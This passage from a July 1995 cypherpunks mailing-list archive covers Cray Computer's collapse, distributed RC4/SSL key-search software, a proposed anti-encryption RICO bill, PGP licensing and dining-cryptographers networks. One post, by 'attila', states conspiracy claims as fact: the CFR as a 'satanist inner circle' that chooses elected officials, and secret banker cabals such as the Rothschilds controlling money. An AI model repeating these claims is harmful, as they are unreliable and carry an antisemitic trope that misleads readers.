Research remained in Minnesota, while Cray Computer was located in Colorado
Springs.

The split was largely arranged because Cray Research was unwilling or
unable to fund both the conventional supercomputer lines _and_ the more
experimental machines favored by Seymour Cray. So they let Seymour and the
technology split off, and a stock distribution was arranged (I was a
shareholder of Cray Research at the time, and recall the distribution).

Cray Research is continuing to sell "Crays," including successors of the
original Cray line and various multiprocessor machines based on the Sparc
processor.

Cray Computer was trying to find customers for its Cray 3 and (planned) Cray 4.

The saga of the collapse of Cray Computer has been going on for the past
year or so, with the last several months being the final chance to
reorganize the company and keep it going. They failed, apparently, and now
the final liquidation of assets is about to happen.

Why didn't the Agency bail them out? Not clear, but my guess is that the
advanced _process_ technology of Cray Computer was not so exciting to the
NSA. The "attack of the killer micros," to use Eugene Miya's phrasing, is
wiping out most conventional advanced processor attempts to get
supercomputer speed.

When a single piece of CMOS silicon gets 200-500 MIPS, and a bunch of them
can be put together, it gets pretty hard to justify hyper-expensive GaAs or
Josephson Junction or whatever technologies.

Sad for Seymour Cray, especially as he'd been pumping some of his own
fortune into keeping Cray Computer going, but its the nature of business.
And he'll bounce back, or take a well-deserved retirement.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 17 Jul 95 13:41:49 PDT
To: hayden@edu.msus.mankato.krypton
Subject: Re: RC4 crack
In-Reply-To: <Pine.ULT.3.91.950717151714.25405B-100000@krypton.mankato.msus.edu>
Message-ID: <20191.9507172036@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I remember when RSA129 was being done, the program you have you manually 
> get a start location, and then email transparent any results that it 
> got.  The program that doled out areas to search would base those on what 
> had already been mailed in.  I don't know the details of how exactly that 
> worked, however.

Yeah it's quite like that except we're going for sockets, and an SMTP
style protocol.  That way people can write other apps to the protocol,
for instance Andy Brown has an SSL bruter and key management s/w for
NT, and he plans to interface to the 'master' software via this socket
protocol, allows intermixing, so some people will be running direct
IP, others with PCs or behind firewalls will be running via the WWW
interface which also talks the SMTP style stuff to the master, and it
would be possible if desired to write an email gateway to the socket
protocol for interacting with the master.

Also the socket protocol (blame Piete for this clever stuff, and most
of the socket protocol design) is planned to work with arbitrary
levels of masters, so you can start a local master say on your local
network, the local master requests keys of the 'big master', and doles
them out to 'slaves' running on each cpu you have.  When all it's
slaves have acked the keyspace it has drawn out from the big master,
it'll ack that bigger keyspace with the bigmaster and draw out some
more keyspace.

> But, if the program could be written in such a way that it was all 
> automatic, mailing in results and automatically (maybe via a telnet 
> port?) getting the information about what to search, that would be most 
> nice. 

Yep a telnet port is it for both reporting and getting keys, also the
WWW interface to the same.

> I'd basicly like to be able to start the program, nice it, slam it
> in the background, and forget about it.

Right, niceing seems to be one option another is to suspend it whilst
people are directly logged in, Kevin and some others have tools for
this kind of thing.  Also there was a similar ultra-nice batch job
suspender which came with RSA129, which we might pinch/combine.

The problem with nicing is that most unix schedulers don't seem to
know what nice means,.. you still get a noticable slow down on
interactive jobs on SGI boxes even if you've got it npri -h 150, and
even though the bruterc4 (and the bruteSSL too) have tiny resident
core sizes).  Also we thought there should be an hours of play option
so you can tell it (the slave) when it is allowed to hammer the
machine, say 6pm - 7am or whatever.

So, yes the idea that you can slam it in the background and forget it
is a very nice one as it ensures max resource usage.  Also it would
allow us to setup a semi-permanent key cracking ring, with slaves that
can support cracking both SSL and RC4, plus whatever anyone else adds
later, you would get to install a new "ability" then your machine
would say know how to do relations for a RSA-512bit or whatever.

Interesting to see how many MIPs can be mustered en masse for this
kind of app.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 17 Jul 95 23:27:24 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <199507180522.AA01543@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

To: danisch@ida.uka.de
Hadmut Danisch writes:

>I am not familiar with american laws and have two questions:

>1. If the bill becomes law, how can someone who violates it be
>punished? 

A criminal RICO violation can be punished by up to 20 years' imprisonment,
as well as forfeiture of any personal or real property constituting
or derived from proceeds of racketeering activity. A convicted RICO
defendant can be fined up to twice the gross profits of the 
racketeering activity. If the defendant disposes of property otherwise
subject to forfeiture, other property owned by the defendant (of equivalent
value) may be seized and forfeited. 18 USC 1963.

RICO also allows private parties injured by a RICO violation to bring a
civil suit and recover three times their actual damages, plus attorneys'
fees and costs. A criminal conviction will operate to estop a RICO 
defendant from denying the facts underlying the criminal conviction in a
subsequent civil suit. 18 USC 1964.

>2. Does someone who publishes software which encodes or encrypts 
>(ASCII is a code, isn't it?) have to prove that he has provided the
>universal decoder to the state or does the state have to prove that he
>didn't do? 

The defendant has to prove that s/he provided the decoder, because 
providing the decoder is an affirmative defense. That puts the burden
of proof on the defendant on that issue. Were the statute worded that
not providing the decoder were an element of the crime, then the
government would need to prove that the defendant hadn't provided it. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAtEm33YhjZY3fMNAQF/DQP/QOT1ZvMG/sCU2QnPpZVhHkAZrZf0R1AU
63QmxQTOZJvqhyvS70zrNmhW6mpXshQRpehQtMuUPDh7vtLS/FMatKaJc3yA+RXC
3vzLz3XNooOfM0fV6yIeVpZC5Nw5iMmyb/IwoVHLvAu7zYoGUi/sLoCW2s9xFa3M
BmJkUL+/RaY=
=fAVx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 17 Jul 95 23:27:27 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <199507180523.AA01552@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

To: Andrew.Spring@ping.be
Andrew Spring writes:

>So I'm wondering who this RICO stuff applies to.  The guy who wrote it and
>uploaded it to an FTP site?  He's not profiting.  The guy who uses it? He
>didn't commit the predicate act.  Who?

RICO does not require that either the enterprise or the predicate acts
were motivated by (hope of) economic gain. _National Organization for Women
v. Scheidler_, 114 S.Ct. 798, 127 L.Ed.2d 99 (1994) or
ftp://ftp.cwru.edu/hermes/ascii/92-780.ZO.filt

Looks like Bob Dornan wants to change that, though (probably because RICO
was used to sue anti-abortion terrorists). He introduced HR 230 which
would amend 18 USC 1961(5) to require "profit-seeking purpose" to establish
a RICO "enterprise". THOMAS says that HR 230 is in the House Judiciary
Committee. 

RICO is at http://www.law.cornell.edu:80/uscode/18/ch96.html et seq :) 
for the curious.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAtASn3YhjZY3fMNAQFZ+AP/VLcDCikMkzT8iA/AmdpKvWpSc/nOybma
/6KCnVgOms7+g+MNnJZHQFzjxV2oMjtXSZD1/0ZQeeuZcJGZDqR1tbwj93JNfRjW
LsNHB9d5xXk9xxbvJwY+TJgCGeZtp7Yb38yVt2MRGioyl5TDPFNOYTbSPr2t0TCr
0k4aeV81Mq0=
=m5jT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 17 Jul 95 20:37:08 PDT
To: cypherpunks@toad.com
Subject: Cray Computer liquidating...
Message-ID: <199507180332.AA24106@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



According to a flier from an e-mail list I'm currently
unwillingly subscribed to, Cray Computer is going out
of business.

Any comments and/or crypto relevance?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Mon, 17 Jul 95 13:53:45 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <v01510101ac3061b81c9d@[193.74.217.20]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>I am not familiar with american laws and have two questions:
>
>1. If the bill becomes law, how can someone who violates it be
>punished?
>

- From the top of my head:
Subpoena your service provider's computer records.  Intimidate your roommate
into testifying against you.  Tapping your phone.  Entrapping you into
doing it.

Feds are in the business of putting people behind bars.  They are _very_ good
at it.

>
>2. Does someone who publishes software which encodes or encrypts
>(ASCII is a code, isn't it?) have to prove that he has provided the
>universal decoder to the state or does the state have to prove that he
>didn't do?

I'm betting that the Feds will adopt as a working definition anything that
requires a key to decrypt the communications.  That means compression
software, rot13, and most hash functions are ok.

>
>In the former case, does he get any receipt from the department of
>justice and what does the receipt say (1.3MByte of software
>received...)?
>

This is the U.S. Government.  They Have Forms.  You just file form
THX1138/KGB666-007, omitting pages 113-115 and substituting Addendum Foxtrot
Uniform Delta; then you're covered.

>In the latter case, how do they want to prove he didn't? If he gave
>just a big
>
>  for(i=0;;i++) try_key(i);
>
>how do they want to prove this doesn't work? There is a certain
>problem in theory. I don't know the english name, but in german it is

It's the Halting Problem, in English.

Expert Testimony:  "We experimented with 113,296 keys chosen at random and
the defendants algorithm took an average of 29,000 years to find each one.
It is our professional opinion, therefore, that the defendant is jacking us
around and ought to be keelhauled".


ObPGP:

Incidentally, did you know that PGP puts a "- " in front of a line that
begins with the word "From"?  Just so "sendmail" doesn't hose your
signatures, I spoz.

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMArcIY4k1+54BopBAQGEQAQA3POWJd+5OtdRy9otN0PZWSzA+wyIjM99
+PqxyoBlfvnrut7xNYzgGOedyLjQHoWMgXwWAtArIr2srFqwr0eUu5aUXcYxySBx
NiEH/G4Y3Z3paL2yOdDLPqrjB7B68UusCYvgTYUCLrkcLU+zqOMfvTPRTx63AQ9h
QoBB8/XMddc=
=/k0o
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Mon, 17 Jul 95 13:53:48 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <v01510102ac3065ad0aaa@[193.74.217.20]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>You _were_ using that software on a _computer_ weren't you?  Guess it's
>one of your racketeer's tools, so we'll have to take it for ourselves, er, um,
>for evidence and protection of national security....

This wasn't really my point.  Grassley's bill implies that uploading crypto
to an overseas FTP site would qualify as a predicate act, needed for a RICO
seizure.  I think he is assuming that someone would do this for the
purposes of making money: and that anything bought with that money would be
RICOable.  I don't think he or anyone else in Congress is aware that people
tend to do this stuff for free.

I remember one of the sponsors of the CDA ranting about pornographers
"profiteering" from pornographic images on the Internet, blissfully unaware
that stuff downloaded from alt.sex.binaries.insert.your.fetish.here doesn't
profit anyone but the phone company (for the hours you stay online to get
it).

So I'm wondering who this RICO stuff applies to.  The guy who wrote it and
uploaded it to an FTP site?  He's not profiting.  The guy who uses it? He
didn't commit the predicate act.  Who?


-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMArYUI4k1+54BopBAQGk6AQAufSXBBB9/XoDcKoWaalLdp+hxO/kSER1
wEtEAcRqh3YZR9IRVFuFsmotJ8exupaOzy+OLldublq1RfaCR/Jjqvc0V1uSovYA
DA9eFjYApGSPoDkQp6C6ZVcJVqpD1QQhNYpY96nABTp45AYsMlrdpartwjJZKDLz
Rx1EFNVwoC4=
=K75H
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Mon, 17 Jul 95 21:35:10 PDT
To: cypherpunks@toad.com
Subject: Re: Deployment
In-Reply-To: <199507170827.BAA12427@ix6.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950717233255.1828A-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Jul 1995, Bill Stewart wrote:

> > > So, anyone want to volunteer to port Privtool to Windows ?
> > Uh, pardon my ignorance, but what is privtool, and why is it
> > a good thing to port it to windows?
> > (As compared to the task of integrating PGP into microsofts
> > mail tool.)
> 
> It's an open-system mail tool resembling Sun's mailtool with PGP support added.
> Open-system tools are one of those vanguard things :-)  
> (So are convenient GUI-development tools.)
> I no longer have a nearby Sun machine to play on, so I haven't played with it,
> but if it's got a well-done interface it's worth porting or stealing concepts
> from to include in other systems.  I've heard that Microsoft's new mail tools
> are far less brain-damaged than the Microsoft Mail I've grown to know and hate,
> which assumes any message that's more than a few lines will be an attached
> document with maybe some optional intro and leftover mail headers,
> and chokes on messages with more than 30K of text in the body (choking badly
> on more than 64K).  (Apparently, part of the reason for this evil is the fault
> of Visual Basic and/or Visual C++, which are convenient GUI development
> tools...)
> 
> On the other hand, integrating it into Free Eudora for Windows would be
> pleasant,
> if that's doable (I forget it source is available.) 
> #                                Thanks;  Bill
> # Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com

Does Privtool support POP3 ??

-Mike

**************************************************************************
*                                                                        * 
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*                                                                        *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*               http://www.computek.net/public/bailey/                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Tue, 18 Jul 95 00:17:26 PDT
To: cypherpunks@toad.com
Subject: SurfWatch for employees (ugh)
Message-ID: <199507180636.AA02056@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Consistent with the trend towards treating employees like children,
Webster Network Strategies has announced (but apparently has not
shipped) a product similar to SurfWatch but aimed at an employment
environment. The product is called "WebTrack" and supposedly supports
access lists of URLs, where access can be allowed to "all but these sites"
or "only to these sites". The product also can be configured to log all 
Web usage by users subjected to its reign of terror. :) WebTrack 
is priced at $7,500 with an annual subscription to its list of 
interesting (err, forbidden) sites priced at $1,500. The article in the
7/10/95 Infoworld doesn't list contact information for Webster
Network Strategies. 

What is it, two months between deployment of software designed to restrict
net access to one segment of the population perceived as especially
vulnerable and the subsequent application of that technology to other 
target groups? My bet is the next target group will be university 
students, followed by "affinity marketing" with various repressive
organizations (whose names I elide in the interests of greater
Cypherpunk harmony, pick your own and imagine them here.) 

Of course, the next step is to use restrictive licensing/distribution
terms (a la Netscape/Mozilla) and a nifty freeware/software package
available only from a site which also carries porn (or other forbidden
fruit) to make the customers/purveyors of this crap twist in the wind
a bit. Break the terms of the license and get the software somewhere
else? Avoid using the coolest new thing because you're hooked up via
we'll-think-for-you.net? Doh.

(Pedants need not point out that personal choice (and personal filtering)
are always appropriate, and indeed empowering. Neither WebTrack nor
NetSurf are marketed to help people subject themselves to a regime
of repression - they are intended and sold to allow the purchaser to
control what others (perceived as having fewer or no rights) will read
and view. ". . inasmuch as you have done it unto one of the least of
these my brethren, ye have done it unto me." Matthew 25:45)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAtWUn3YhjZY3fMNAQH8EAP/aFXe7uI1EuIB31L8h7H+5l3Mg1aQE7e9
i86FnqwGMDg5JlDvJD05dXOBXeInvKtc6ZD0Us+qwDmg2ISo/Yu0QCfedTBgZ7fq
s/3WFwtOcpiBG7YTkxGJrvB+r4KIgodb9QSGEQ8yofKaRLT33IkgO3ijxrnyoNkX
vm/tZ8EnoV0=
=hrOo
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal9001@panix.com (Robert A. Rosenberg)
Date: Mon, 17 Jul 95 20:51:42 PDT
To: cypherpunks@toad.com
Subject: Re: WSJ on remailers...
Message-ID: <v02130505ac3063d78727@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:00 7/17/95, Peter Wayner wrote:
>The WSJ has a  article on anonymous remailers buried in the B section. It
>is pretty straightforward and ends up quoting some Finnish police officer
>saying that they're not going to go raiding remailers on any suspicion.
>They'll need a real crime.

That Finnish comment is probably due to the fall-out/flap from their raid
on anon.penet.fi in the CoS case.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 23:51:46 PDT
To: mfroomki@umiami.ir.miami.edu
Subject: Re: Root Causes Roots
Message-ID: <199507180649.XAA25403@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:08 PM 7/17/95 -0400, Jim Ray wrote:
[ Crypto timeline and discussion omitted ]
>Careful thought reveals a atrong suspicion that the "3/5ths people" 
>[slaves] had more use for crypto at the time than free white males 
>did, but I doubt much, if any, evidence of that activity was 
>preserved, and I'm sure it was _forcefully_ discouraged if ever
>discovered...My point is, slaves, or those who live in fear of 
>eventual slavery, for whatever reason, have a strong affinity for 
>cryptography. Note, for example, early use [mentioned in the timeline
>above] by the Jewish people.

Or, more precisely, they have a strong affinity for private in-group
communications.
Cryptography's a bit tough in an environment where it was often illegal to
teach slaves to read.  On the other hand, oral cultures are often good at
using metaphor and in-jokes and shared knowledge to express things that
the speaker doesn't want the oppressive group to understand.  I've seen
commentaries
talking about that in North American black culture, and there are other examples
like Cockney rhyming slang.  And then, of course, there are totally
incomprehensible
communication systems like Gaelic :-), which the Brits tried hard to stamp out.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 23:51:54 PDT
To: tim werner <cypherpunks@toad.com
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <199507180649.XAA25411@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 PM 7/17/95 -0400, tim werner wrote:
>>... I was talking to one of the sys admins at
>>A-B, and he said that we weren't allowed to use PGP to encrypt our mail,
>>because Viacrypt owned the commercial rights.

Actually, it's less clear than that.  It's pretty clear what you can
do with ViaCrypt code; just read the license to see who can use it,
and you can send any kind of messages you want over it, even for money.

On the other hand, the definitions of "non-commercial use" for RSAREF and
IDEA are far less clear (and they're clearer for RSAREF than for IDEA,
and I got the impression from what I read somewhere on the net or in the PGP
docs
that the initial permission from Ascom-Tech for use of IDEA with PGP was
pretty informal, and that they've been trying to tighten up what's covered.)
(Also RSAREF licenses have changed from version to version, and the
license PKP uses to distribute versions of RSAREF may also have changed?)

Selling software containing the code is pretty clearly commercial.
Non-commercial messages from your personal non-business machine are
clearly non-commercial.  Providing a service of encrypting and decrypting
messages for people for money sounds like it's _very_ probably commercial.
Encrypting and decrypting messages to/from your business that deal with money
are a very gray area.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 23:51:20 PDT
To: cypherpunks@toad.com
Subject: Re: Here it is; bi-directional dining cryptographers
Message-ID: <199507180649.XAA25418@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Context: Bidirectional DCnets, Alice and Bob simultaneously transmitting
to each other.  Interesting approach, though you do have to schedule it
somehow.  It's a different take on the uses of DCnets - the original
was for an anonymous-1 to many rather than a 1 to 1 with only the two
participants
knowing, though in the first case the recipient can be known only to the sender
if they want to arrange things that way through shared secrets or whatever.

At 01:31 PM 7/17/95 +0100, Rev. Mark Grant wrote:
>Yes, but presumably it's expected that they would be using secure
>encryption on the messages that they're sending. That might still provide
>some information about the message for traffic analysis, e.g. if you send
>a PGP message you have your key-id at the beginning, and if you knew the 
>keys of all members of the DC-net you could XOR them and see who's 
>talking to who.

Presumably people will use multiple key-ids on the net as well - Alice may
have a general-use "Alice" key, and maybe also a general-use "Medusa" key,
but Alice or Medusa may have also arranged with Bob to use a different key
for traffic where he doesn't mind if she knows he sent it and he doesn't want
anyone else knowing it's being sent to her.  Also, he can do this anonymously,
so she doesn't know either:

        Alice posts Plaintext("Hi, I'm Alice, key AAAA")
        Bob   posts Encrypt(AAAA, "Hi, Alice, I'm Dr. X, Key XXXX, please
                        post a key I can use to talk to you")
        Alice posts Encrypt(XXXX, Signed(AAAA, "Hi, Dr. X, use key AXAX"))

Bob's message lets him send stuff to Alice without anyone, including her,
knowing it's from him, since the name X and key XXXX are new randoms.
Alice signs her response so Dr. X knows that key AXAX will really go to
Alice and
not to Mallet who's impersonating Alice; she doesn't really care who X is.
If traffic analysis is a concern (Alice noticing, for instance, that she's
getting a _lot_ of requests from key AXAX for her remailer to send stuff
to destination ZZZZ), Bob can keep sending her new requests for keys and ids,
and not reuse them more than he thinks is safe.

>I'd have thought the most significant problem would be reserving the
>blocks in an anonymous fashion while not allowing denial-of-service
>attacks. 

Since anybody can send bits at any time, and nobody can tell who without
lots of collusion, you can't prevent denial-of-service (well, I assume not,
unless there's something rather non-obvious in the literature.)
The Bad Guy can decide if it's more fun to jam the reservations or the messages.
What reservation does for you is gives a short inefficient period (with
possible collisions, backoff-and-retry, etc., depending on algorithm) that
you can use to 
reserve a longer one-user period for message traffic, so you can spend most
of your time talking instead of haggling over interruptions.

One way to do reservations is to use some variant on Slotted Aloha for the
reservation period - for example, everybody picks a random id number for the
session,
(with odd parity or odd high-bit to make collision detection easier),
waits a random number of slots, and then sends their id number.
If there's a collision, wait and retry, maybe with exponential backoff.
After the first slot that's got data and looks like it doesn't have a collision,
anybody who thinks that it was their number picks a different number,
waits a short random number of slots and posts; first one wins.
(If you're using 32-bit randoms and have fewer than a million players, 
the chances of two undetected collisions in a row are really small,
even if people cheat a bit on their backoffs.)  Winner announces how many
slots he's going to use up for his message, so you know when to start again.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 23:51:25 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <199507180649.XAA25423@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:06 PM 7/17/95 +0200, Hadmut Danisch wrote:
>1. If the bill becomes law, how can someone who violates it be
>punished? 
Only by violating the Constitution and basic common sense,
but that doesn't usually bother the Government very much...

>2. Does someone who publishes software which encodes or encrypts 
>(ASCII is a code, isn't it?) have to prove that he has provided the
>universal decoder to the state or does the state have to prove that he
>didn't do? 

It's not defined in the law, and if the good Senator writes stupid offensive
laws which are so stupid that they have big holes in them like this,
I don't intend to correct him :-)

>In the former case, does he get any receipt from the department of
>justice and what does the receipt say (1.3MByte of software
>received...)?

Nobody knows.

>In the latter case, how do they want to prove he didn't? If he gave
>just a big 
>  for(i=0;;i++) try_key(i);
>how do they want to prove this doesn't work?  [... halting problem...]

The proposed law doesn't say that the mechanism has to decrypt the
message in a short period of time.  If the law passes, I'll be happy to help 
write the PGP Universal Decoder program for anybody who needs it to take to
court.
Some kinds of program are affected by the Halting Problem; other kinds
are easy to show that they halt.  For the PGP Universal Decoder,
trial division can find the factors for an N-bit key in much less than
2**N tries, if you program it well, and you know it will halt by then,
if the Universe hasn't decayed first.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 17 Jul 95 23:52:17 PDT
To: Phil Fraering        <futplex@pseudonym.com
Subject: Re: bi-directional dining cryptographers
Message-ID: <199507180649.XAA25432@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:24 PM 7/17/95 -0500, Phil Fraering wrote:
>I'd also like to point out that this system indicates that during
>an attack/disruption on a traditional dc-net, the disruptor can 
>tell what the original person was trying to send, even though noone
>else can.
>
>And then perhaps XOR the data with something offensive, and if the
>original sender tries to re-send, broadcast the result of the XOR,
>resulting in a total net output of the offensive material.

That's difficult - you have to identify that the sender is sending
the same message while the message is being sent, rather than
one or two bit-times later, and you can't fake encryption with an
unknown keyid or digital signatures.  (Digital signatures aren't
something everybody would use very often on a DC-net, since the purpose
of the net is to be anonymous, but since you can do anonymous broadcasts,
you can anonymously post a signature key for your nym if you want to.)

Also, there's no need to combine jamming and posting an offensive message;
they both work well separately.  I suppose you could do that if you only
want to harass the net a bit (e.g. replace all trafic to remailer X
with new remail to whitehouse.gov, or replace all postings from
Cancelmoose with complaints about censorship), but basically DCnets
degrade rapidly if the social structure of the net members does.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Mon, 17 Jul 95 15:46:08 PDT
To: cypherpunks@toad.com
Subject: Safford's Nemesis
Message-ID: <Pine.HPP.3.91.950718003511.2899A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Kahn (1962) doesn't really explain why vital Magic intercepts and
the 'winds' execute did not prevent the Pearl Harbour disaster. 

I just read 'Infamy' by John Toland (1982), containing 'proof'
- very convincing, in my opinion - of the Pearl Harbour cover-up.
The US president, selected members of his cabinette and a
few admirals and generals knew - from Magic and the 'winds'
execute, radio traffic analysis, diplomatic sources, double
agents - exactly when and where the Japaneese were going to
attack, but didn't warn Hawaii, fearing that too efficient
counter-measures by the Oahu military might make the attack
abort and so not convince the isolationists. The unexpected 
tactical capabilities of the Japaneese armada then made a
cover-up all the more important.

What has been revealed since? Are the views in Toland's book
now 'official', established history, or what?

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@PrimeNet.Com>
Date: Mon, 17 Jul 95 21:44:44 PDT
To: tim werner <werner@mc.ab.com>
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
In-Reply-To: <9507171938.AA03018@mondo.ab.com>
Message-ID: <Pine.BSI.3.91.950718041341.3919A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


   CFR = Council on Foreign Relations which consists of two levels of 
membership, about 3000 in the lower level and 500 in the "secret" inner 
sanctum. you can not ask to jihn the CFR, you are asked.  There are 
minutes of the meetings, nor are guests welcome.  The membership includes 
bankers (big time bankers only), powerful politicians, but the bulk of 
the membership is made of the OLD money crowd,,, Harvard (Delphi, Fly, 
Phoenix, etc) and Yale (Skull and Bones).  This is where the power in 
America "sleeps" and controls US policy, who is going to be elected, 
etc.  For instance: both Clinton and Bush are members.
   A second similar organization is the Tri-Lateral commission which has 
been dominated and funded by David Rockefeller (Chairman of Chase 
Manhatten Bank). There is a great deal of "selective" overlap in the two 
memberships.
   and, there is an even more select and far more secret top level at the 
global lever: The Bilderburgers  --it's secret enough that nonone knows 
the total membership.

   there are others such as Baron de Rothchild's bankers group which 
includes the central bank chairmen of all the major countries which have 
semi-automonous central banks like our Federal Reserve.  This group is 
ultimately the most dangerous since they have the power to print money 
--funny money when their respective governments need a little debt 
financing. 

-----------------original ---------------------

On Mon, 17 Jul 1995, tim werner wrote:

> >Date: Wed, 5 Jul 1995 04:32:41 +0000 (GMT)
> >From: attila <attila@PrimeNet.Com>
> 
> >and, conspiracy theories non-withstanding, we the people do not govern 
> >America --we are only given a short list of politicians who have sold 
> >their soul to CFR's satanist inner circle.
> 
> What's CFR?
> 
> 
> tw
> 
> -- 
> 
> Well, Bust My Britches!  Eggs Almondine and a Bottle of Beaujolais!
> 

--
Ask not what your country can do for you. Do it yourself!
____________________________________________________________________________
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|gc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
____________________________________________________________________________
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365

 "the slammer and the firing squad are just stones on the road to freedom."
	--attila

 "In nature, stupidity gets you killed.
   In the workplace, it gets you promoted.
    In politics, it gets you re-elected."
        --attila

 "Go not unto Usenet for advice, for the inhabitants will say 
   yes, and no, and maybe, and I don't know, and fuck off, and...."
	--attila

                | The pen may often be mightier than the sword,
 *<%%%%%%%%%%%%|+>-================================-------------------
                | but, the sword sure as hell is faster....

"If I wanted your opinion, I would have asked for it -in triplicate" 
	--attila
____________________________________________________________________________






